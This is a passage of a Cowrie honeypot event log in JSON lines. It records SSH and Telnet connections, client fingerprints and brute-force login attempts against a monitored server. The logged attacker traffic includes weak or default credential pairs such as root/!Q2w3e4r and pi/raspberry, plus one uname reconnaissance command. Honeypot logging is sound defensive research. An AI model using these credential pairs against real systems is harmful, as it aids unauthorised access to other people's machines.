{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:29:20.596058Z","src_ip":"51.79.164.132","session":"0edbc90cca23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:29:20.596844Z","src_ip":"51.79.164.132","session":"0edbc90cca23"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:29:26.927843Z","src_ip":"51.79.164.132","session":"0edbc90cca23"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:29:31.047972Z","src_ip":"51.79.164.132","session":"0edbc90cca23"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:29:31.048721Z","src_ip":"51.79.164.132","session":"0edbc90cca23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:29:32.929010Z","src_ip":"51.79.164.132","session":"0edbc90cca23"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:29:33.006613Z","src_ip":"51.79.164.132","session":"0edbc90cca23"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56302,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b1016e2039d","protocol":"ssh","message":"New connection: 51.79.164.132:56302 (1.2.3.4:22) [session: 6b1016e2039d]","sensor":"my-vps","timestamp":"2025-08-28T08:29:42.893794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:29:47.009140Z","src_ip":"51.79.164.132","session":"6b1016e2039d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:29:47.009888Z","src_ip":"51.79.164.132","session":"6b1016e2039d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59416,"dst_ip":"1.2.3.4","dst_port":22,"session":"66ea5be3b5f0","protocol":"ssh","message":"New connection: 217.72.205.35:59416 (1.2.3.4:22) [session: 66ea5be3b5f0]","sensor":"my-vps","timestamp":"2025-08-28T08:30:00.402460Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:30:00.404646Z","src_ip":"217.72.205.35","session":"66ea5be3b5f0"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T08:30:08.096456Z","src_ip":"51.79.164.132","session":"6b1016e2039d"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":51522,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d245020fdd1","protocol":"telnet","message":"New connection: 79.124.8.120:51522 (1.2.3.4:23) [session: 7d245020fdd1]","sensor":"my-vps","timestamp":"2025-08-28T08:30:08.529078Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:30:08.569695Z","src_ip":"79.124.8.120","session":"7d245020fdd1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:30:08.593343Z","src_ip":"79.124.8.120","session":"7d245020fdd1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45522,"dst_ip":"1.2.3.4","dst_port":22,"session":"651c09bb66bc","protocol":"ssh","message":"New connection: 51.79.164.132:45522 (1.2.3.4:22) [session: 651c09bb66bc]","sensor":"my-vps","timestamp":"2025-08-28T08:30:10.433472Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:30:10.853327Z","src_ip":"176.65.149.186","session":"942facf677dd"}
{"eventid":"cowrie.session.closed","duration":180.48156809806824,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:30:10.856863Z","src_ip":"176.65.149.186","session":"942facf677dd"}
{"eventid":"cowrie.session.closed","duration":"31.2","message":"Connection lost after 31.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:30:14.143987Z","src_ip":"51.79.164.132","session":"6b1016e2039d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:30:15.164217Z","src_ip":"51.79.164.132","session":"651c09bb66bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:30:15.165010Z","src_ip":"51.79.164.132","session":"651c09bb66bc"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:30:22.633303Z","src_ip":"212.227.125.160","session":"8c597031e8e4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49304,"dst_ip":"1.2.3.4","dst_port":22,"session":"2642f15411d1","protocol":"ssh","message":"New connection: 51.79.164.132:49304 (1.2.3.4:22) [session: 2642f15411d1]","sensor":"my-vps","timestamp":"2025-08-28T08:30:36.493590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:30:42.730246Z","src_ip":"51.79.164.132","session":"2642f15411d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:30:42.732107Z","src_ip":"51.79.164.132","session":"2642f15411d1"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-28T08:30:42.978741Z","src_ip":"51.79.164.132","session":"651c09bb66bc"}
{"eventid":"cowrie.session.closed","duration":"40.6","message":"Connection lost after 40.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:30:51.080604Z","src_ip":"51.79.164.132","session":"651c09bb66bc"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":36600,"dst_ip":"1.2.3.4","dst_port":22,"session":"c67a11f1e2eb","protocol":"ssh","message":"New connection: 51.79.164.132:36600 (1.2.3.4:22) [session: c67a11f1e2eb]","sensor":"my-vps","timestamp":"2025-08-28T08:31:06.095809Z"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-28T08:31:07.465117Z","src_ip":"51.79.164.132","session":"2642f15411d1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:31:10.605331Z","src_ip":"51.79.164.132","session":"c67a11f1e2eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:31:10.606073Z","src_ip":"51.79.164.132","session":"c67a11f1e2eb"}
{"eventid":"cowrie.session.closed","duration":"36.7","message":"Connection lost after 36.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:31:13.220321Z","src_ip":"51.79.164.132","session":"2642f15411d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f03ceda51df","protocol":"ssh","message":"New connection: 212.227.125.160:6103 (1.2.3.4:22) [session: 7f03ceda51df]","sensor":"my-vps","timestamp":"2025-08-28T08:31:15.645147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T08:31:15.712808Z","src_ip":"212.227.125.160","session":"7f03ceda51df"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T08:31:15.782054Z","src_ip":"212.227.125.160","session":"7f03ceda51df"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T08:31:16.686694Z","src_ip":"212.227.125.160","session":"7f03ceda51df"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:31:16.688300Z","src_ip":"212.227.125.160","session":"7f03ceda51df"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:31:25.352037Z","src_ip":"51.79.164.132","session":"c67a11f1e2eb"}
{"eventid":"cowrie.session.closed","duration":"22.8","message":"Connection lost after 22.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:31:28.920830Z","src_ip":"51.79.164.132","session":"c67a11f1e2eb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34214,"dst_ip":"1.2.3.4","dst_port":22,"session":"5df314ba59d5","protocol":"ssh","message":"New connection: 51.79.164.132:34214 (1.2.3.4:22) [session: 5df314ba59d5]","sensor":"my-vps","timestamp":"2025-08-28T08:31:39.036497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:31:40.686084Z","src_ip":"51.79.164.132","session":"5df314ba59d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:31:40.687191Z","src_ip":"51.79.164.132","session":"5df314ba59d5"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-28T08:31:45.025680Z","src_ip":"51.79.164.132","session":"5df314ba59d5"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:31:47.067828Z","src_ip":"51.79.164.132","session":"5df314ba59d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51064,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e8b5af5a6c0","protocol":"ssh","message":"New connection: 212.227.235.229:51064 (1.2.3.4:22) [session: 6e8b5af5a6c0]","sensor":"my-vps","timestamp":"2025-08-28T08:31:52.802950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:31:55.275432Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:31:55.276379Z","src_ip":"212.227.235.229","session":"6e8b5af5a6c0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52068,"dst_ip":"1.2.3.4","dst_port":22,"session":"f85ad5f7dfc6","protocol":"ssh","message":"New connection: 51.79.164.132:52068 (1.2.3.4:22) [session: f85ad5f7dfc6]","sensor":"my-vps","timestamp":"2025-08-28T08:32:06.430278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:32:06.587914Z","src_ip":"51.79.164.132","session":"f85ad5f7dfc6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-